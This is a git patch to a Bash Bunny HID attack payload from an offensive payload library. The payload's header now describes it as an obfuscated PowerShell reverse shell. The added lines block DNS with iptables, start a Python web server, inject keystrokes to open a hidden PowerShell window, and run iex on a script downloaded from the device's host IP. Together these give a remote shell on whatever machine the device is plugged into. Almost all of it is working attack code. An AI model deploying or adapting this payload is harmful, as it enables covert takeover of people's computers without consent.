From a991cd7af49ba339c1ee813e9fc26306c7902733 Mon Sep 17 00:00:00 2001 From: 0iphor13 <79219148+0iphor13@users.noreply.github.com> Date: Wed, 19 Oct 2022 18:26:40 +0200 Subject: [PATCH] Update payload.txt --- .../remote_access/PingZhellBunny/payload.txt | 45 ++++++++++--------- 1 file changed, 25 insertions(+), 20 deletions(-) diff --git a/payloads/library/remote_access/PingZhellBunny/payload.txt b/payloads/library/remote_access/PingZhellBunny/payload.txt index 2b62fa78..b21d67b2 100644 --- a/payloads/library/remote_access/PingZhellBunny/payload.txt +++ b/payloads/library/remote_access/PingZhellBunny/payload.txt @@ -1,39 +1,44 @@ #!/bin/bash # -# Title: PingZhellBunny -# Description: Get remote access using a icmp reverse shell. +# Title: ReverseBunnySSL +# Description: Get remote access, using an obfuscated powershell reverse shell. # Author: 0iphor13 -# Version: 1.3 +# Version: 1.5 # Category: Remote_Access -# Attackmodes: HID, Storage +# Attackmodes: HID, RNDIS_ETHERNET LED SETUP - -Q DELAY 500 +ATTACKMODE RNDIS_ETHERNET HID GET SWITCH_POSITION -DUCKY_LANG de +GET HOST_IP -Q DELAY 500 +cd /root/udisk/payloads/$SWITCH_POSITION/ -ATTACKMODE HID STORAGE +# starting server +LED SPECIAL -#LED STAGE1 - DON'T EJECT - PAYLOAD RUNNING +# disallow outgoing dns requests so the server is accessible immediately +iptables -A OUTPUT -p udp --dport 53 -j DROP +python -m SimpleHTTPServer 80 & -LED STAGE1 +# wait until port is listening +while ! nc -z localhost 80; do sleep 0.2; done -#After you have adapted the delays for your target, add "-W hidden" +#Opens hidden powershell instance Q DELAY 1500 -RUN WIN "powershell -Exec Bypass -NoP -NonI" +Q GUI r +Q DELAY 500 +Q STRING "powershell -NoP -NonI -w h" Q DELAY 500 Q ENTER -Q DELAY 1000 -Q STRING "iex((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\PingZhell.ps1')" -Q DELAY 3000 +Q DELAY 500 + +#Insert attacking IP +Q STRING "\$IP = '0.0.0.0';" +Q DELAY 250 +Q STRING "iex (New-Object Net.WebClient).DownloadString(\"http://$HOST_IP/PingZhellBunny.ps1\")" +Q DELAY 400 Q ENTER -Q DELAY 1000 - -ATTACKMODE HID - LED FINISH